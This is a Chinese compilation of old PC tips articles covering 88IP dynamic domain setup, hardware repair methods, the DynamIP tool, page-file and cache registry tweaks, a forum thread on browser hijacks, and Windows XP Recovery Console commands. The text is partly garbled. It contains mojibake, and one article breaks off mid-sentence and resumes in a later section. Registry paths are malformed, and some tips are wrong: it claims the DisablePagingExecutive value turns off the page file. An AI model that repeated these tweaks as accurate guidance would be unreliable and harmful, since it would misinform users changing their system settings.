    ８８ＩＰ需要付费注册才能拥有一个永久域名，如果免费注册则仅能试用１５天。运行８８ＩＰ标准版客户端，会弹出设置窗口。要获得一个域名，需要先注册。在“基本资料”中，依次填写好用户登录名、有效电子邮件地址、密码和联系电话，接下来就要选择你的域名，在“域名资料”中，“域名”框填入ｄｙｓ２，“域名后缀”下拉框里选择“８８ｉｐ．ｃｏｍ”，这时，下方的“你的完整域名为”会显示为ｄｙｓ２．８８ｉｐ．ｃｏｍ，确认无误后，点“注册”按钮注册。如果注册的用户名或申请的域名已经被其他用户注册过，软件会做出相应的提示，修改后再次注册即可。注册成功后，在“执行状态”中会显示“注册成功，用户ＩＤ：ｘｘｘｘｘｘｘｘ”，记下用户ＩＤ，以备将来缴费或需要技术支持之用。最后要点击“装载”按钮将刚刚申请成功的账户信息装载至本机上

有零工作室　www.you0.com www.you0.net联系QQ 3149886


电脑维修的基本方法

《一键清理系统垃圾》

电脑维修的基本方法

一、观察法
观察，是维修判断过程中第一要法，它贯穿于整个维修过程中。观察不仅要认真，而且要全面。要观察的内容包括：
1、 周围的环境；
2、 硬件环境。包括接插头、座和槽等；
3、 软件环境；
4、 用户操作的习惯、过程
二、最小系统法
最小系统是指，从维修判断的角度能使电脑开机或运行的最基本的硬件和软件环境。最小系统有两种形式：
硬件最小系统：由电源、主板和CPU组成。在这个系统中，没有任何信号线的连接，只有电源到主板的电源连接。在判断过程中是通过声音来判断这一核心组成部分是否可正常工作；
软件最小系统：由电源、主板、CPU、内存、显示卡/显示器、键盘和硬盘组成。这个最小系统主要用来判断系统是否可完成正常的启动与运行。
对于软件最小环境，就“软件”有以下几点要说明：
1、 硬盘中的软件环境，保留着原先的软件环境，只是在分析判断时，根据需要进行隔离如卸载、屏蔽等）。保留原有的软件环境，主要是用来分析判断应用软件方面的问题
2、 硬盘中的软件环境，只有一个基本的操作系统环境（可能是卸载掉所有应用，或是重新安装一个干净的操作系统），然后根据分析判断的需要，加载需要的应用。需要使用一个干净的操作系统环境，是要判断系统问题、软件冲突或软、硬件间的冲突问题。
3、 在软件最小系统下，可根据需要添加或更改适当的硬件。如：在判断启动故障时，由于硬盘不能启动，想检查一下能否从其它驱动器启动。这时，可在软件最小系统下加入一个软驱或干脆用软驱替换硬盘，来检查。又如：在判断音视频方面的故障时，应需要在软件最小系统中加入声卡；在判断网络问题时，就应在软件最小系统中加入网卡等。
最小系统法，主要是要先判断在最基本的软、硬件环境中，系统是否可正常工作。如果不能正常工作，即可判定最基本的软、硬件部件有故障，从而起到故障隔离的作用。
最小系统法与逐步添加法结合，能较快速地定位发生在其它板软件的故障，提高维修效率。
三、逐步添加/去除法
逐步添加法，以最小系统为基础，每次只向系统添加一个部件/设备或软件，来检查故障现象是否消失或发生变化，以此来判断并定位故障部位。
逐步去除法，正好与逐步添加法的操作相反。
逐步添加/去除法一般要与替换法配合，才能较为准确地定位故障部位。
四、隔离法
是将可能防碍故障判断的硬件或软件屏蔽起来的一种判断方法。它也可用来将怀疑相互冲突的硬件、软件隔离开以判断故障是否发生变化的一种方法。
上提到的软硬件屏蔽，对于软件来说，即是停止其运行，或者是卸载；对于硬件来说，是在设备管理器中，禁用、卸载其驱动，或干脆将硬件从系统中去除。
五、替换法
替换法是用好的部件去代替可能有故障的部件，以判断故障现象是否消失的一种维修方法。好的部件可以是同型号的，也可能是不同型号的。替换的顺序一般为：
1、 根据故障的现象或第二部分中的故障类别，来考虑需要进行替换的部件或设备；
2、 按先简单后复杂的顺序进行替换。如：先内存、CPU，后主板，又如要判断打印故障时，可先考虑打印驱动是否有问题，再考虑打印电缆是否有故障，最后考虑打印机或并口是否有故障等；
3、 最先考查与怀疑有故障的部件相连接的连接线、信号线等，之后是替换怀疑有故障的部件，再后是替换供电部件，最后是与之相关的其它部件。
4、 从部件的故障率高低来考虑最先替换的部件。故障率高的部件先进行替换。
六、比较法
比较法与替换法类似，即用好的部件与怀疑有故障的部件进行外观、配置、运行现象等方面的比较，也可在两台电脑间进行比较，以判断故障电脑在环境设置，硬件配置方面的不同，从而找出故障部位。
七、升降温法
在上门服务过程中，升降温法由于工具的限制，其使用与维修间是不同的。在上门服务中的升温法，可在用户同意的情况下，设法降低电脑的通风能力，靠电脑自身的发热来升温；降温的方法有：1）一般选择环境温度较低的时段，如一清早或较晚的时间；2）使电脑停机12~24小时以上等方法实现；3）用电风扇对着故障机吹，以加快降温速度。
八、敲打法
敲打法一般用在怀疑电脑中的某部件有接触不良的故障时，通过振动、适当的扭曲，甚或用橡胶锤敲打部件或设备的特定部件来使故障复现，从而判断故障部件的一种维修方法。
九、对电脑产品进行清洁的建议
有些电脑故障，往往是由于机器内灰尘较多引起的，这就要求我们在维修过程中，注意观察故障机内、外部是否有较多的灰尘，如果是，应该先进行除尘，再进行后续的判断维修。在进行除尘操作中，以下几个方面要特别注意：
1、 注意风道的清洁
2、 注意风扇的清洁
风扇的清洁过程中，最好在清除其灰尘后，能在风扇轴处，点一点儿钟表油，加强润滑。
3、 注意接插头、座、槽、板卡金手指部分的清洁
金手指的清洁，可以用橡皮擦拭金手指部分，或用酒精棉擦拭也可以。
插头、座、槽的金属引脚上的氧化现象的去除： 一是用酒精擦拭，一是用金属片（如小一字改锥）在金属引脚上轻轻刮擦。
4、 注意大规模集成电路、元器件等引脚处的清洁
清洁时，应用小毛刷或吸尘器等除掉灰尘，同时要观察引脚有无虚焊和潮湿的现象，元器件是否有变形、变色或漏液现象。
5、 注意使用的清洁工具
清洁用的工具，首先是防静电的。如清洁用的小毛刷，应使用天然材料制成的毛刷，禁用塑料毛刷。其次是如使用金属工具进行清洁时，必须切断电源，且对金属工具进行泄放静电的处理。
用于清洁的工具包括：小毛刷、皮老虎、吸尘器、抹布、酒精（不可用来擦拭机箱、显示器等的塑料外壳）。
6、 对于比较潮湿的情况，应想办法使其干燥后再使用。可用的工具如电风扇、电吹风等，也可让其自然风干。
十、软件调试的几个方法和建议
1、 操作系统方面。
主要的调整内容是操作系统的启动文件、系统配置参数、组件文件、病毒等。
修复操作系统启动文件。
1) 对于Windows 9x系统，可用SYS命令来修复（要保证MSDOS.SYS的大小在1KB以上），但要求，在修复之前应保证分区参数是正确的。这可使用诸如DiskMap之类的软件实现；
2) 对于Windows 2000/XP系统，有两种方法——修复启动文件，使用fixboot命令；修复主引导记录，使用fixmbr命令。
调整操作系统配置文件。
A. 对于Windows 9x系统，可用的工具很多，如：Msconfig命令、系统文件检查器、注册表备份和恢复命令（scanreg.exe，它要求在DOS环境下运行。另外如果要用scanreg.exe恢复注册表，最好使用所列出的恢复菜单中的第二个备份文件）等；
B. 对于Windows 2000系统，可用的工具与Windows 9x相比比较少，但某些调试命令可用Win98中的一些命令（如win98下的Msconfig命令，就可用在windows 2000下）；
C. 对于Windows XP系统，可用的工具主要是Msconfig命令；
D. 调整电源管理和有关的服务，可以使用的命令是，要“运行”文本框中输入gpedit.msc来进行；
E. 所有操作系统的调试，都可通过控制面板、设备管理器、计算机管理器（Windows 9x系统无）来进行系统的调试。
组件文件（包括.DLL、.VXD等）的修复
A. 通过添加删除程序来重新安装；
B. 通过从.CAB文件中提取安装；
C. 可用系统文件检查器（sfc.exe命令）来修复有错误的文件；
D. 从好的机器上拷贝覆盖。
检查系统中的病毒。
建议使用命令行方式下的病毒查杀软件，并能直接访问诸如NTFS分区。
2、 设备驱动安装与配置方面。
主要调整设备驱动程序是否与设备匹配、版本是否合适、相应的设备在驱动程序的作用下能否正常响应。
A. 最好先由操作系统自动识别（特别要求的除外，如一些有特别要求的显示卡驱动、声卡驱动、非即插即用设备的驱动等），而后考虑强行安装。这样有利于判断设备的好坏；
B. 如果有操作系统自带的驱动，则先使用，仍不能正常或不能满足应用需要，则使用设备自带的驱动；
C. 更换设备，应先卸载驱动再更换。卸载驱动，可从设备管理器中卸载；再从安全模式下卸载；进而在INF目录中删除；最后通过注册表卸载；
D. 更新驱动时，如直接升级有问题，须先卸载再更新。
3、 磁盘状况方面。
检查磁盘上的分区是否能访问、介质是否有损坏、保存在其上的文件是否完整等。
可用的调整工具：
A. DiskMap，方便地找回正确的分区；
B. Fdisk及Fdisk /MDR，检查分区是否正确及使主引导记录恢复到原始状态；
C. 当硬盘容量大于64GB时，如果要重新分区或查看分区，要求使用随机附带的磁盘分区软盘中的Fdisk命令。这个命令可用windows Me下的Fdisk命令来代替；
D. Format、Scandisk、厂商提供的磁盘检测程序，检查磁盘介质是否有坏道；
E. 文件不完整时，要求对不完整的文件先进行改名，再用在“操作系统方面”中所述的方法重建。
4、 应用软件方面。
如应用软件是否与操作系统或其它应用有兼容性的问题、使用与配置是否与说明手册中所述的相符、应用软件的相关程序、数据等是否完整等；
5、 BIOS设置方面。
1) 在必要时应先恢复到最优状态。建议：在维修时先把BIOS恢复到最优状态（一般是出厂时的状态），然后根据应用的需要，逐步设置到合适值。
2) BIOS刷新不一定要刷新到最新版，有时应考虑降低版本。
6、 重建系统。
在硬件配置正确，并得到用户许可时，可通过重建系统的方法来判断操作系统之类软件故障，在用户不同意的情况下，建议使用自带的硬盘，来进行重建系统的操作。在这种情况下，最好重建系统后，逐步复原到用户原硬盘的状态，以便判断故障点。
1) 重建系统，须以一键恢复为主，其次是恢复安装，最后是完全重新安装。恢复安装的方法：
对于Windows 9x系统，直接从光盘安装，或执行tools\sysrec\pcrestor.bat，即可实现恢复安装。在进行恢复安装时，可能由于win.com的存在而影响安装过程的正常进行，这时，可在Windows目录下，删除win.com后，再重新安装。
另一种恢复安装，是将根目录下的System.1st改名为System.dat后覆盖掉Windows目录下的同名文件，之后重启即可。但这种方法，不是真正意义上的重新安装，而类似于完全重新安装。
对于Windows XP或Windows2000系统，直接使用其安装光盘启动，在安装界面中选择修复安装，选择R时会出现两个选项：一是快速修复，对于简单问题用此选择；另一是故障修复台，只要选择正确的安装目录就可启用故障修复台。故障修复台界面类似于DOS界面。
2) 为保证系统干净，在安装前，执行Fdisk /MBR命令（也可用Clear.com）。必要时，在此之后执行Format <驱动器盘符> /u [/s]命令。
3) 一定要使用随机版的或正版的操作系统安装介质进行安装。


动态IP地址的捕获及应用

《一键清理系统垃圾》

动态IP地址的捕获及应用

一、IP地址与IP地址的动态分配

    1. IP地址基本概念

    Internet依靠TCP/IP协议，在全球范围内实现不同硬件结构、不同操作系统、不同网络系统的互联。在Internet上，每一个节点都依靠唯一的IP地址互相区分和相互联系。IP地址是一个32位二进制数的地址,由4个8位字段组成，每个字段之间用点号隔开,用于标识TCP/IP宿主机。

    每个IP地址都包含两部分:网络ID和主机ID。网络ID标识在同一个物理网络上的所有宿主机，主机ID标识该物理网络上的每一个宿主机，于是整个Internet上的每个计算机都依靠各自唯一的IP地址来标识。

    IP地址构成了整个Internet的基础，它是如此重要，每一台联网的计算机无权自行设定IP地址，有一个统一的机构―IANA负责对申请的组织分配唯一的网络ID,而该组织可以对自己的网络中的每一个主机分配一个唯一的主机ID，正如一个单位无权决定自己在所属城市的街道名称和门牌号，但可以自主决定本单位内部的各个办公室编号一样。

    2. 静态IP与动态IP

    IP地址是一个32位二进制数的地址，理论上讲,有大约40亿（2的32次方）个可能的地址组合，这似乎是一个很大的地址空间。实际上，根据网络ID和主机ID的不同位数规则，可以将IP地址分为A（7位网络ID和24位主机ID）、B（14位网络ID和16位主机ID）、C（21位网络ID和8位主机ID）三类，由于历史原因和技术发展的差异，A类地址和B类地址几乎分配殆尽，目前能够供全球各国各组织分配的只有C类地址。所以说IP地址是一种非常重要的网络资源。

    对于一个设立了因特网服务的组织机构，由于其主机对外开放了诸如WWW、FTP、E-mail等访问服务，通常要对外公布一个固定的IP地址，以方便用户访问。当然，数字IP不便记忆和识别，人们更习惯于通过域名来访问主机，而域名实际上仍然需要被域名服务器（DNS）翻译为IP地址。例如，你的主页地址是www.myhost.com，用户可以方便地记忆?..modem.com/dips/<你的账户名>。

    这一功能允许网上用户通过该URL访问你的本地主页，这是指在本地主机安装的Web服务器（例如个人Web服务器）。当你要调试主页或者无法找到一个提供满意的免费主页服务器，或者你认为上载主页太浪费时间时，这项功能就显得尤为重要，目前的虚拟域名服务与此不同的是，虚拟域名服务要求你的主页必须安放在具有固定域名的主页服务器上，然后才能提供转移访问，而动态IP服务器则可以随时跟踪你的动态IP，并将访问者转移到你的本地Web服务器上。只要你联网并且你的本地Web服务器正在运行，DynamIP可以自动地确定你的DIPS信息是否需要更新到动态IP服务器。配合DIPS，用户可以在不上载任何文件的情况下进行Web聊天。

    4. POP mail checker：电子信箱检查，可最多检查5个不同的POP3账户，并在新邮件到来后以可视或声音信号进行提示，自动运行E-mail客户端软件取信。

    5. IP chat：点对点IP聊天，类似IRC，但是不需要任何IRC服务器，DynamIP可以在用户指定IP地址区间内扫描，你可以向所有聊天成员或者特定IP地址广播消息，你可以向其他聊天成员打招呼以引起对方注意并建立一个私人聊天。DynamIP支持微软网络电话软件MS NetMeeting。

    6. WEBchat：Web聊天。你的主页访问者可以利用浏览器直接与你对话，即使对方没有安装DynamIP，前提是你在主页中安装了如图2的页面，该页面将被DynamIP动态更新，浏览器必须支持forms，Netscape和Internet Explorer，毫无疑问都支持forms。访问者可以在forms中填写语句，然后按submit按钮，该语句被发送到你的计算机（利用DynamIP捕获的动态IP）。可以与功能3配合实现本地Web聊天，则不必上载主页到任何服务器。

    7. HTTPscan：HTTP扫描。DynamIP可以在用户指定IP地址区间内扫描，并以超文本文件格式生成一个包含所有被搜索到的HTTP服务器的清单。用途之一是当你与某人进行点对点IP聊天时，你可以立即访问对方的主页。

    8. PC Clock Synchronizer：时钟同步。DynamIP可以从NTP服务器获得精确的日期和时间以校准你的机器时钟，另外也可以用来部分地解决“千年虫”问题。

    五、DynamIP的安装、设置

    1. DynamIP的安装

    DynamIP的安装只有一个条件，那就是你的Windows系统中必须有VB6.0的运行库―MSVBVM60.DLL。该文件没有包含在DynamIP的软件包中，用户必须从微软公司VB官方站点下载，文件名是Vbrun60new.exe，它是自动安装文件，文件长度为1MB。

    2. DynamIP的设置

    DynamIP的基本原理是很简单的，DynamIP将利用模板文件（Template）中的各项形式参数来更新一个本地文件，该文件包含了你的当前动态IP地址，然后DynamIP自动上载该文件到你的个人主页服务器，于是其他访问你的主页的用户可以利用该页面上的动态IP地址信息与你建立连接，实现各种网络应用；或者DynamIPS更新你的DIPS信息到动态IP服务器，所有访问该服务器的用户可以被转移到你的本地Web服务器上。所以在设置和准备DynamIP的时候，一切工作都是围绕这个模板文件和你的动态IP地址进行的。

    DynamIP的主要功能是Uploader文件上载工具（动态IP地址发布），本文将以此为例介绍DynamIP的设置，其他各项功能的设置类似。运行DynamIP，选择setup-uploader，则进入设置窗口（图3），各项参数如下：

    Active：打开/关闭此项服务；

    Remote Host：你的主页所在的FTP主机地址，注意不要填写主机上的路径；

    Login：你的FTP账户名；

    Password：你的FTP账户口令；这三项参数使得DynamIP可以登录到你的FTP主机，自动上载更新的文件，通常填写的是存放饕车闹骰?刂贰?

    Template Online：联机模板文件，该文件将用来生成包含你的IP地址的动态本地文件（LocalFile），模板文件不会被更新。本地文件和模板文件名字不能相同，否则DynamIP不会正常工作。如果此项填写“”，则DynamIP将上载未更新的本地文件，可以用来上载数码相机拍摄的图片进行动态直播，参看“refresh every”。

    Template OFFline：脱机模板文件，通常与联机模板相同，如果你想在脱机之前上载一个不同的页面，你可以选择一个不同的模板文件，此项可以填写“”，功能同上。

    Local File：本地动态文件的路径和文件名，以联机或者脱机模板文件为样式更新的文件，包含用户当前动态IP地址等信息。

    Remote File：存放在FTP服务器上的远程动态文件的路径和文件名，本地动态文件将上载和覆盖该文件，不要填写服务器的域名或者IP地址。

    IP：联机模板文件中的IP地址形式参数，该参数将在联机时被用户当前的动态IP地址所替换，DynamIP默认的形式参数是NOT.ON.LINE.NOW，通常没有必要改动，若改动，则此项内容必须与模板文件中的形式参数名完全相同。模板文件中还包含了其他形式参数，如IP、DateTime、WEBchat、HTTP Server、FTP Server，这些形式参数都将在联机时被DynamIP自动替换，因此最好不要随便改动，即使改动，也要注意每个形式参数的名称不得相同

    ，并且各项内容必须与模板文件中的形式参数名完全相同。

    post last IP(OFFline)：张贴上次IP地址，脱机模板文件中代表上次IP地址的形式参数，默认值为( is the default value)。此项内容必须与模板文件中的形式参数名完全相同。

    DateTime：联机模板文件中的日期时间形式参数。

    HTTP Server/Port：联机模板文件中的HTTP服务器/端口形式参数，这里的HTTP服务器系建立在本地主机上的HTTP服务器（例如个人Web服务器），DynamIP用你的当前动态IP地址替换该参数，以便将访问者转移到你的本地Web服务器。默认值为：“default value is HTTP Server NOT available. ”默认端口值为：80。

    FTP Server/Port：联机模板文件中的FTP服务器/端口形式参数，含义同上，只是服务器为本地FTP服务器。默认值为：“FTP Server NOT available”，默认端口值为：21。

    FTP UserID：联机模板文件中的FTP用户ID形式参数，默认值为：“anonymous”，可以改变为其他账户名。

    六、DynamIP应用实例

    假如网上任意两个用户（实际上是计算机）能够相互知道对方的IP地址，则双方就能利用TCP/IP建立直接的点对点网上连接，进行信息沟通。更进一步，主叫方只要获得了被叫方的IP地址，就可以发出呼叫、建立连接、实现应用，如利用网络电话直接通话或者发送文件。DynamIP正是抓住了建立点对点IP连接的关键环节，捕捉并发布用户的当前动态IP地址，以便接收其他用户的呼叫。以下为DynamIP应用举例。

    1. 点对点网络电话

    在主页中添加下面一行语句：

    我正在网上，请给我打电话

    若访问者通过IE浏览器访问该页面，点击该超链接将会运行网络电话软件NetMeeting呼叫IP地址为111.222.123.123的计算机，如果对方的NetMeeting处于等待状态，则可以接收到呼叫，并进行通话。

    微软公司的浏览器支持callto协议，可以用NetMeeting呼叫该超链接指定的IP地址。但是Netscape的浏览器不支持callto，解决的办法是改为一个指向快速拨号文件的超链接，这样无论是在IE还是在Netscape中，打开该拨号文件都会运行网络电话软件NetMeeting。

    语句如下：

     我正在网上，请给我打电话

    这里ls.cnf是一个NetMeeting的快速拨号文件，记录了被叫方的IP地址，内容如下：

    [ConferenceShortcut]

    ConfName=111.222.123.123

    Address=111.222.123.123

    CallFlags=65543

    Transport=1

    类似的语句还有：click here to call me，可以激活Vocaltech Iphone。

    以上工作可以直接利用DynamIP的联机模板文件（图2）来实现，DynamIP将利用模板文件更新本地动态文件，上载并覆盖远程动态文件，主页的访问者看到的是包含当前IP地址的超链接，点击超链接将会激活网络电话软件，建立点对点网络电话连接服务。网络电话NetMeeting支持利用服务器实现的间接连接和呼叫对方IP地址的直接点对点连接，这里使用的是后者。如果你上载了脱机文件，访问者将得知你不在网上。

    2. IP chat：点对点IP聊天（图4），类似IRC，但是不需要任何IRC服务器，因为双方已经知道IP地址。注意要在Setup--pchat中打开Active。工具栏中有用于呼叫、扫描、睡眠/唤醒的各项功能按钮。

    3. WEBchat：Web聊天，你的主页访问者可以利用浏览器直接与你对话（图5），即使对方没有安装DynamIP，前提是你在主页中安装了如图2的页面，该页面将被DynamIP动态更新。

    用户可以决定上载联机文件或者脱机文件，以便及时通知访问者自己是否联网。

    4. 动态IP的个人Web服务器：若已经在本地主机安装了个人Web服务器，可以利用DIPS服务，将访问者转移到你的本地主机。这需要申请一个免费账户。网址是：

    http://postmodem.com/dips-admin/。

    七、总结与提示

    DynamIP可以捕获和发布用户的当前动态IP地址，从而使点对点的IP连接成为可能，这些是网络传呼软件无法做到的。另外，对于每一种基本功能，如果能够巧妙地结合其他方法，往往能实现更复杂的应用。例如，你是否想过在运行TCP/IP的局域网上使用DynamIP的强大功能呢？

    同时应该注意到，DynamIP更像是为高级网络用户准备的发烧级工具。在网上公布自己的动态IP地址固然有利于沟通，但同时也带来了相当大的风险，因为黑客用以搜索和攻击目标的坐标就是IP地址，许多流行黑客工具甚至只需要一个输入参数―你的IP地址。因此，最好不要在存放重要资料的计算机上进行这些高级网络应用试验。


对“缓存”的全面理解和优化

《一键清理系统垃圾》

对“缓存”的全面理解和优化

理解缓存
    操作系统的任务主要是合理地调配系统的各种资源，为各种程序的运行提供环境，它可以
看作是硬件和应用软件之间的一个媒介。其中对内存的管理是系统的最主要的职责，怎么样使
有限的内存用在刀刃上，怎么要保证系统本身所需的内存（以防止死机，在win2000和winxp里
这一点已经做的非常好了），怎样克服各种硬件连接的瓶颈。
    本文主要就这种硬件连接的瓶颈问题展开一些讨论。大家知道计算机的主要硬件，硬盘，
内存和处理器之间的速度是不一样的，其中处理器的速度是非常快的，内存次之，而硬盘的速
度是很慢的（相对于处理器来说），一件任务的处理要通过处理器给出的指令，把相关数据从
硬盘里调出来，到内存，在内存和处理器之间还会有许多数据的传输，内存本身不能处理数据
，要通过处理器来处理，当他们一起工作的时候，由于处理器和内存工作得快，它们常在把事
做完了没事做了，要等硬盘，这样就大大降低了系统的整体性能，不能发挥所有硬件的性能。
为了解决这个问题，一个优秀的操作系统必然要有“缓存”来作为这些硬件之间的一个中间站
，来缓和这种矛盾，从而一定程度上提高系统的性能，“缓存”处理的越好，系统的性能发挥
的越好。所以研究“缓存”就有了它的意义。
    看了上面的内容，以前对“缓存”没有认识的朋友应该理解它了。理解之后马上可以应用
的地方就是在自购兼容机的时候。大家大可不必去追赶潮流，买什么P4处理器，而应该买一个
快一点的硬盘，比如买个7200转的（或更快的），以减少瓶颈的矛盾。处理器吗，买赛扬好了
，一般是没问题的，处理器大多数时候是闲着的，有时处理很多个大任务时可能会有些紧张，
注意避免就可以了。
    从某种角度讲，内存本身是硬盘和处理器之间的一个缓存，它的作用是缓解硬盘和处理器
之间的尖锐矛盾的。当它被作为一个固定的部件后，它本身也成了需要用缓存来缓解瓶颈的对
象。它对处理器和硬盘夹在中间，是他们的必经之路，硬盘与处理器之间的关系成了硬盘与内
存和内存与处理器之间的双重关系。所以上面提到的瓶颈问题的处理归结为对内存的优化，即
怎样处理好硬盘与内存之间的缓存很处理器与内存之间的缓存。
    对于一个想了解操作系统的人来说，能够理解“缓存”对对它做适当的优化是比不可少的
一节课。另外再不从一下，缓存的概念是很广泛的，这里专指内存的缓存。
缓存的优化
    操作系统本身已经有了很多优化措施，而我们只能在它的优化措施的基础上根据我们的实
际情况来优化。

    1,最“著名”的缓存是页面文件，这个倒不是缓解速度的，而是缓解容量的，在速度上，
硬盘不如内存，但是容量上，内存是不可能跟硬盘比的，当你运行一个程序需要大量数据，占
有大量内存时，内存就要被塞满，怎么办呢？把那些暂时不用的放到硬盘里去，因为处理器总
是只调用处理一个任务所需的数据，其他的准备的数据（就是那些可能要用的，但暂时还不用
的）可以先放一放，如果内存放不下，就只好放到硬盘了。但是这样做是有代价的，当放到内
存的数据重新要被使用时，你就得等很长时间等系统把在硬盘中得数据调上来。其实你可以感
受到系统的这些动作，比如你打开IE或Office，第一次打开是很慢的，但是关闭后马上再打开
就快很多，这是因为这时数据还没被系统“请”出内存，系统从内存中直接取得数据自然快了
；另一个情况，当你开了一个photoshop这样的大软件，这时打开Office要比平时还慢一点，
这是因为内存本来被photoshop占领着，要调入Office的数据到内存就必须把photoshop的数据
“请”出内存，多了这个过程，打开自然要慢一些。
    优化页面文件，可以做一下几条：
    1）把页面文件放到系统盘之外，这样做主要是为了保持页面文件的连续性，硬盘读取数
据是*磁头在磁性物质上“读”得到数据的，页面文件放在物理上的不同区域，磁头就要跳来
跳去，自然不利于效率。系统盘文件众多，页面文件几乎肯定不连续。所以要把它移到其他盘
。要提醒一点，当你移动好页面文件后，要把原来的删除掉，系统不会自动删除。
    2）如果有两个硬盘，把页面文件放在转速快的那个，原因上面已讲了很多遍了。
    3）最大最小页面文件的设置原则。有很多人建议将这两个值设置成相等的，我不知道他
们是那里来的依据，其实这样设置是不合理的。我们先要知道他们两个值的意义。一般情况下
，内存是不会真的“塞满”，它会在内存储量到达一定程度时自动将一部分暂时不用的数据放
到硬盘，最小页面文件是所说的“一定程度”的具体比例的决定因素，最小页面文件大，比例
就低，反之则相反；最大页面文件是极限值，有时你开了很多程序，内存和最小页面文件都满
了，就自动溢出到最大页面文件。所以，将两者设为一样大是不合理的。最小页面文件要小一
些，这样能够在内存中尽可能存更多的数据，效率就高，最大页面文件大一些，以免出现“全
满”的的情况。
    4）winxp现在支持4G内存，哪怕你有5，6百M的内存，你都不需页面文件了，这时可以把
页面文件禁掉。到注册表编辑器HKEY_LOCAL_MACHINE\System\CurrentControlSet\ControlSe
ssion Manager \Memory Management下，找到DisablePagingExecutive（禁用页面文件）设其
值为1。
    5）在同上的注册表编辑器位置上有个ClearPageFileAtShutdown（关机时清除页面文件）
，这里所说的“清除”页面文件（即虚拟内存）并非是指从硬盘上完全删除pagefile .sys这
个文件，而是对其进行“清洗”和整理，从而为下次启动Win2K更好地利用虚拟内存作好准备
。这样做还有利于安全，页面文件上的残留的数据是可以用特殊的工具读到的，而这些数据你
可能并不想让人知道。这样做的代价是关闭系统时间会加长。 将其值设为1即可。
    6）学过C的朋友们应该对操作内存有个概念，一个任务完成后，要用free函数来释放内存
，但有很多软件在设计的时候，并没有在所有环节都这样做，这会造成无用的数据占据内存，
对这种情况可以使用一些内存优化软件，让这钟软件来完成释放内存的动作。

    2，下面介绍和优化一些不著名的缓存：
    1）内存读取硬盘数据要经过一个系统缓存（system cache），它的位置是在内存的特定
区域，它是用来缓解硬盘与内存之间的速度不平衡的。它是以牺牲内存资源来换取从硬盘读取
数据时的速度的，有了这块缓存，系统能从硬盘预读所需的数据，减少系统等待的时间。如果
你的内存很大，比如5，6百M，那么你除了可以采取上面说的关闭页面文件的方法外，还可以
起用打的系统缓存。做法如下，进入注册表编辑器： HKEY_LOCAL_MACHINE\System\Current
ControlSet\ControlSession Manager \Memory Management，找到LargeSystemCache（启用大
的系统缓存），将它的值设为1就可以了。
    这样设置了后，systemcache从4M增加到8M，再win2000和winxp中，这个值是动态的，如
果内存不足，systemcache占据的空间可以自动相应调整。
    2）处理器从内存读取数据的缓存是什么呢？是二级数据高级缓存（缓冲），同样它也要
在内存中占一个空间，所以最好是有了大内存之后再设置这个值。也需再注册表里设置，方法
如下：进入 HKEY_LOCAL_MACHINE\System\CurrentControlSet\ControlSession Manager \Me
mory Management ，找到 SecondLevelDataCache，默认为256，大内存设为512。

    好了经过了上面的介绍，我想对朋友们来说最重要收获的是加深了对缓存和操作系统的认
识，至于优化的方法，我得承认一般的朋友是用不着去做的，当然“玩”一下也是很有意思的


恶意网站怎么消除

《一键清理系统垃圾》

恶意网站怎么消除

令我倒霉的是打开ie 就出现了一大窜的网页，真烦 在注册表把所有的连接都
删除了，重器后还是不行
怎么办呀》？

嗯,如楼上所说差不多~
检查:
开始-启动组
检查MSCONFIG里的启动,WIN.INI里的WINDOWS这项,检查AUTOEXEC.BAT
检查REGEDIT里的所有RUNXX项~
最后检查IE的开始页,选择一个速度较快,干净的网址,然后锁定
最后去下载IE的补丁~

查不多我来　总结一下．．开始-运行　msconfig　启动里面不要的全去掉．．具体msconfig各项　论坛里有介绍　　在看看添加删除程序里面有没有黄色网站的小程序　卸载掉（有的要卸载两遍）
用３７２１的上网助手　清一下　　或者用魔法兔子　ＩＥ清楚器什么的都行～～～～
从启ＯＫ！

点ie图标属性,看是否后面加了一个网址,如果桌面上的ie 是快捷方式的话就要小心了.


Windows XP 控制台命令详解

《一键清理系统垃圾》

Windows XP 控制台命令详解

- 辅助操作和特殊功能命令

编者语：
    Windows XP（包括 Windows 2000）的控制台命令是在系统出现一些意外情况下的一种非常有效的诊断和测试以及恢复系统功能的工具。小编的确一直都想把这方面的命令做个总结，这次辛苦老范给我们整理了这份实用的秘笈。

    Cls

    清除屏幕。

    清除后的屏幕只显示命令提示符和插入点。

    Disable

    禁用 Windows XP 、Windows 2000 或 Windows NT 4.0 系统服务或设备驱动程序。disable 命令仅在使用故障恢复控制台时才可用。

    disable {service_name] |[ device_driver_name}

    参数

    service_name

    要禁用的系统服务名称。

    device_driver_name

    要禁用的设备驱动程序名称。

    范例

    下例将禁用 Eventlog 服务：

    disable eventlog

    注意

disable 命令将指定的服务或驱动程序的启动类型设为 SERVICE_DISABLED 。
使用 disable 命令禁用系统服务或设备驱动程序时，该系统服务或设备驱动程序上次启动类型的名称将显示在屏幕上。应该记下该名称，以便在需要时使用 enable 命令将启动类型恢复为上次的设置 。
共有五种启动类型。前三种类型是：SERVICE_AUTO_START 、SERVICE_DISABLED 和SERVICE_DEMAND_START 。对应的标准启动类型：自动、禁用和手动，通常使用“计算机管理”管理工具中的“服务”进行配置。后两种类型是：SERVICE_BOOT_START 和 SERVICE_SYSTEM_START，通常用于配置加载设备驱动程序的方式。例如，在启动计算机时或启动 Windows 时加载。
    Enable

    启用 Windows XP 、Windows 2000 或 Windows NT 4.0 系统服务或设备驱动程序。enable 命令仅在使用故障恢复控制台时才可用。

    enable {service_name |device_driver_name}[ startup_type]

    参数

    service_name

    要启用的系统服务的名称。

    device_driver_name

    要启用的设备驱动程序的名称。

    startup_type

    要为服务或设备驱动程序指派的启动类型。有效的启动类型包括：

SERVICE_BOOT_START
SERVICE_SYSTEM_START
SERVICE_AUTO_START
SERVICE_DEMAND_START
    范例

    下例将 Eventlog 服务的启动类型设为自动或 SERVICE_AUTO_START：

    enable eventlog service_auto_start

    注意

如果不指派启动类型，enable 命令将列出在 service_name 中指定的服务或设备驱动程序的当前启动类型。
使用 enable 命令更改启动类型时，上次启动类型的名称将显示在屏幕上。应该记下该名称，以便在需要时将启动类型恢复为上次的设置。
    Exit

    关闭故障恢复控制台并重新启动计算机。exit 命令仅在使用“故障恢复控制台”时才可用。

    exit

    参数　　无

    Help

    提供有关故障恢复控制台命令的联机信息。

    help [ commandname]

    参数　　无

    列出故障恢复控制台中提供的命令。

    commandname

    提供有关命令信息，包括命令使用的参数。

    注意

有两种方法可以获得命令的联机帮助。可以指定 help 命令后的命令名称，或者可以在命令提示符中键入该命令名称和 /?。开关。例如，键入下列命令可以获得有关extract 命令的信息：
help extract
extract /?

